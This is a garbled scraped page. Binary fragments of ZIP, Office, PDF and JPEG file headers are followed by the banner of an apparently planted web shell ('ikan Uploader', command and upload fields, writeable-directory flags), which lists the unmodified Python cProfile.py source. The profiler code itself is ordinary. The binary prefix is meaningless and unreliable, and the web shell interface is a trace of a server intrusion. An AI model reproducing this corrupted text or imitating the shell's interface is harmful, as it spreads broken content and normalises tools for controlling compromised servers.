œ_#ÁÕ§TE NAŒ“KeÉ:”(åŽÖJÞùY’‚ñùž7; «]Û ý`8g“¯B© jd ÖÖ¸ðzÂœ¸¦4Ç3Kó^(ÍÖ¼ Õ€pvìwšõB4d f$Èü^0˜…åÌC$#2FŽÑ§±¦ÛZ/÷š&m£ñzÒÖ ’.Î]!Î;ƒ(Õ–¢d/—#Kª+tZyuÏB>NÛÖ†(¸ŒSà'³„Y˜´-_•¦¼´˜OlNK§¶ÒàŠˆTHµƒeTPå·fïM’…þuÏÍüp6دªE£åü‡ZØ'CKF#â«;‹eyO Qp„†l"ö1èíÙP ÏŒúl! BÝ2ñª•_VÁÉ÷3eu`–F¸ìI--ö<¿žë¯4õ캿¢)34Å{wMÉ2ÆÖFŸ¥` e9Ú¶¸P‡.”FÔï rY ‚²ÈTB,{ÛœéJ}«àQ4¹0Rû4D‚B§S‘ dO•v¾„™Sן¯3FeŸ™«+ÓâwH dÕÛÌì·P4ë&¥#rÜÉ Ù¦ê†ý·xòqk¯2,¹§™E\­ék‚×SᔏںÙ⺷ö£6…à ʾ qSá³Å|;àû}4Ÿ($â¹VY~óÍ!èÜÒŒËX½Ù1j‚VíÍŸš³+œ]«½g{_{/vµ½\¢¶vÉWKÿ:ñám½ ¥ S²x‘t ŽšÝÙÿÀÇ^ný PK   IW™k‚½÷ á  _rels/.relsUT dìd dìd dìd­’ÏNÃ0 ‡ï{ŠÈ÷ÕÝ@¡¥» ¤Ý*`%îÑ&QâÁöö‚J£ì°cœŸ¿|¶²ÙÆA½rL½wVE Šñ¶w­†çúay * 9Kƒw¬áÈ ¶ÕbóÄIîI]’Ê—4t"á1™ŽGJ…ìòMããH’±Å@æ…ZÆuYÞ`üÍ€jÂT;«!îì T} |Û7MoøÞ›ýÈNN<|v–í2ÄÜ¥ÏèšbË¢Ázó˜Ë )„"£O­Ï7ú{ZYÈ’yÞç#1'tuÉM?6o>Z´_å9›ëKÚ˜}?þ³žÏÌ·N>fµx PK    IWª½e  ¢ U  € word/document.xmlUT dìdPK    IWþË3” z  €J¢ word/settings.xmlUT dìdPK    IWC‡{š' ƒ  €¤ docProps/custom.xmlUT dìdPK    IW츱=Œ   €‡¥ [Content_Types].xmlUT dìdPK    IWV%ë±"   €U§ docProps/app.xmlUT dìdPK    IW€RŒ 3  €¶¨ docProps/core.xmlUT dìdPK    IWkòDn ô  €ª word/_rels/document.xml.relsUT dìdPK    IW ;$î   €Î« word/fontTable.xmlUT dìdPK    IW+åäz] ÷.  €ý¬ word/numbering.xmlUT dìdPK    IW¤2×r- ¿  €›° word/styles.xmlUT dìdPK    IWMFÒ ø  €´ word/header1.xmlUT dìdPK    IWF— T e  €· word/media/image1.jpegUT dìdPK    IW!Yéáå   €°Ë word/media/image2.pngUT dìdPK    IW°Àºë ú  €ÙÌ word/media/image3.pngUT dìdPK    IW$“†ª L  €Î word/footer1.xmlUT dìdPK    IWzaGôM   €ñÑ word/footer2.xmlUT dìdPK    IW–µ­âº P  €}Õ word/theme/theme1.xmlUT dìdPK    IW™k‚½÷ á €{Û _rels/.relsUT PK   ! bîh^   [Content_Types].xml ¢(   ¬”ËNÃ0E÷HüCä-Jܲ@5í‚Ç*Q>Àēƪc[žiiÿž‰ûB¡j7±ÏÜ{2ñÍh²nm¶‚ˆÆ»R ‹ÈÀU^7/ÅÇì%¿’rZYï @1__f› ˜q·ÃR4DáAJ¬h>€ãÚÇVßƹ ªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I‹"{Üv^¥P!XS)bR¹rú—K¾s(¸3Õ`cÞ0†½ÝÎß»¾7M4²©ŠôªZƐk+¿|\|z¿(Ž‹ôPúº6h_-[ž@!‚ÒØ Pk‹´­2nÏ}Ä?£LËð Ýû%áÄßdºždN"m,à¥ÇžDO97*‚~§Èɸ8ÀOíc|n¦Ñ äEøÿöéºóÀBÉÀ!$}‡íàÈé;{ìÐå[ƒîñ–é2þ ÿÿ PK   ! µU0#ô L _rels/.rels ¢(   ¬’MOÃ0 †ïHü‡È÷ÕݐBKwAH»!T~€Iܵ£$Ý¿'TƒG½~üÊÛÝ<êÈ!öâ4¬‹;#¶w­†—úqu *&r–Fq¬áÄvÕõÕö™GJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥†=™ZÆMYÞbø®ÕBSí­†°·7 ê“Ï›×–¦é ?ˆ9LìÒ™ÈsbgÙ®|Èl!õùUSh9i°bžr:"y_dlÀóD›¿ý|-NœÈR"4ø2ÏGÇ% õZ´4ñ˝yÄ7 ëÈðÉ‚‹¨Þ ÿÿ PK   ! Q48wÛ —  xl/workbook.xml¤UÙnâ0}iþ!cñ‡ *–¢AšVU×$dC¬&vÆv UÕŸë@XÊK§/¹p|Žï¹N÷b“¥Ö •Š ÞC¸î"‹òHÄŒ¯zèá~b·‘¥4á1I§=ôJºèÿüÑ] ù¼âÙ ®z(Ñ:GE ͈ª‹œrˆ,…̈†©\9*—”Ä*¡Tg©ã¹nàd„q´Eåg0ÄrÉ":Q‘Q®· ’¦D}•°\UhYô¸ŒÈç"·#‘å ±`)Ó¯%(²²(œ®¸d‘‚ì nZ w v¡ñª• t¶TÆ")”Xê:@;[Ògú±ë`|²›ó=ø’ïHúÂL÷¬dðEVÁ+8€a÷Ûh¬Uz%„Íû"ZsÏÍCýî’¥ôqk]‹äù5ÉL¦Rd¥Dé˘i÷P ¦bM/|dÉ",…¨çãFNoçiûéë>aêiçsó#ðÄ ÕTr¢éHp ÜIú®ÝJìQ"ÀÜÖ-ý[0I¡¦ÀZ Z…d¡nˆN¬B¦=4 g %PDF-1.4 %âãÏÓ 3 0 obj << /Linearized 1 /L 422775 ÿØÿà JFIF    ÿÛ C      ÿÛ C   ÿÀ  X" ÿÄ    ÿÄ H   !1A"Qaq2‘¡#±ÁBRÑ3Cbrá$S‚¢²ð4ñ%6DTc’ÂsÿÄ   ÿÄ =  !1AQ"aq‘Á2R¡±BÑð#3br’²4á$‚¢ÂñÿÚ   ? áHBßÝ`„! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! ! stream

___________________________ < root@rinduuu:~# /home/rinduuuuuuu?! > ___________________________

Command :
ikan Uploader :
Directory :  /lib64/python3.12/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //lib64/python3.12/cProfile.py
#! /usr/bin/python3.12

"""Python interface for the 'lsprof' profiler.
   Compatible with the 'profile' module.
"""

__all__ = ["run", "runctx", "Profile"]

import _lsprof
import importlib.machinery
import io
import profile as _pyprofile

# ____________________________________________________________
# Simple interface

def run(statement, filename=None, sort=-1):
    return _pyprofile._Utils(Profile).run(statement, filename, sort)

def runctx(statement, globals, locals, filename=None, sort=-1):
    return _pyprofile._Utils(Profile).runctx(statement, globals, locals,
                                             filename, sort)

run.__doc__ = _pyprofile.run.__doc__
runctx.__doc__ = _pyprofile.runctx.__doc__

# ____________________________________________________________

class Profile(_lsprof.Profiler):
    """Profile(timer=None, timeunit=None, subcalls=True, builtins=True)

    Builds a profiler object using the specified timer function.
    The default timer is a fast built-in one based on real time.
    For custom timer functions returning integers, timeunit can
    be a float specifying a scale (i.e. how long each integer unit
    is, in seconds).
    """

    # Most of the functionality is in the base class.
    # This subclass only adds convenient and backward-compatible methods.

    def print_stats(self, sort=-1):
        import pstats
        pstats.Stats(self).strip_dirs().sort_stats(sort).print_stats()

    def dump_stats(self, file):
        import marshal
        with open(file, 'wb') as f:
            self.create_stats()
            marshal.dump(self.stats, f)

    def create_stats(self):
        self.disable()
        self.snapshot_stats()

    def snapshot_stats(self):
        entries = self.getstats()
        self.stats = {}
        callersdicts = {}
        # call information
        for entry in entries:
            func = label(entry.code)
            nc = entry.callcount         # ncalls column of pstats (before '/')
            cc = nc - entry.reccallcount # ncalls column of pstats (after '/')
            tt = entry.inlinetime        # tottime column of pstats
            ct = entry.totaltime         # cumtime column of pstats
            callers = {}
            callersdicts[id(entry.code)] = callers
            self.stats[func] = cc, nc, tt, ct, callers
        # subcall information
        for entry in entries:
            if entry.calls:
                func = label(entry.code)
                for subentry in entry.calls:
                    try:
                        callers = callersdicts[id(subentry.code)]
                    except KeyError:
                        continue
                    nc = subentry.callcount
                    cc = nc - subentry.reccallcount
                    tt = subentry.inlinetime
                    ct = subentry.totaltime
                    if func in callers:
                        prev = callers[func]
                        nc += prev[0]
                        cc += prev[1]
                        tt += prev[2]
                        ct += prev[3]
                    callers[func] = nc, cc, tt, ct

    # The following two methods can be called by clients to use
    # a profiler to profile a statement, given as a string.

    def run(self, cmd):
        import __main__
        dict = __main__.__dict__
        return self.runctx(cmd, dict, dict)

    def runctx(self, cmd, globals, locals):
        self.enable()
        try:
            exec(cmd, globals, locals)
        finally:
            self.disable()
        return self

    # This method is more useful to profile a single function call.
    def runcall(self, func, /, *args, **kw):
        self.enable()
        try:
            return func(*args, **kw)
        finally:
            self.disable()

    def __enter__(self):
        self.enable()
        return self

    def __exit__(self, *exc_info):
        self.disable()

# ____________________________________________________________

def label(code):
    if isinstance(code, str):
        return ('~', 0, code)    # built-in functions ('~' sorts at the end)
    else:
        return (code.co_filename, code.co_firstlineno, code.co_name)

# ____________________________________________________________

def main():
    import os
    import sys
    import runpy
    import pstats
    from optparse import OptionParser
    usage = "cProfile.py [-o output_file_path] [-s sort] [-m module | scriptfile] [arg] ..."
    parser = OptionParser(usage=usage)
    parser.allow_interspersed_args = False
    parser.add_option('-o', '--outfile', dest="outfile",
        help="Save stats to <outfile>", default=None)
    parser.add_option('-s', '--sort', dest="sort",
        help="Sort order when printing to stdout, based on pstats.Stats class",
        default=2,
        choices=sorted(pstats.Stats.sort_arg_dict_default))
    parser.add_option('-m', dest="module", action="store_true",
        help="Profile a library module", default=False)

    if not sys.argv[1:]:
        parser.print_usage()
        sys.exit(2)

    (options, args) = parser.parse_args()
    sys.argv[:] = args

    # The script that we're profiling may chdir, so capture the absolute path
    # to the output file at startup.
    if options.outfile is not None:
        options.outfile = os.path.abspath(options.outfile)

    if len(args) > 0:
        if options.module:
            code = "run_module(modname, run_name='__main__')"
            globs = {
                'run_module': runpy.run_module,
                'modname': args[0]
            }
        else:
            progname = args[0]
            sys.path.insert(0, os.path.dirname(progname))
            with io.open_code(progname) as fp:
                code = compile(fp.read(), progname, 'exec')
            spec = importlib.machinery.ModuleSpec(name='__main__', loader=None,
                                                  origin=progname)
            globs = {
                '__spec__': spec,
                '__file__': spec.origin,
                '__name__': spec.name,
                '__package__': None,
                '__cached__': None,
            }
        try:
            runctx(code, globs, None, options.outfile, options.sort)
        except BrokenPipeError as exc:
            # Prevent "Exception ignored" during interpreter shutdown.
            sys.stdout = None
            sys.exit(exc.errno)
    else:
        parser.print_usage()
    return parser

# When invoked as main program, invoke the profiler on a script
if __name__ == '__main__':
    main()

........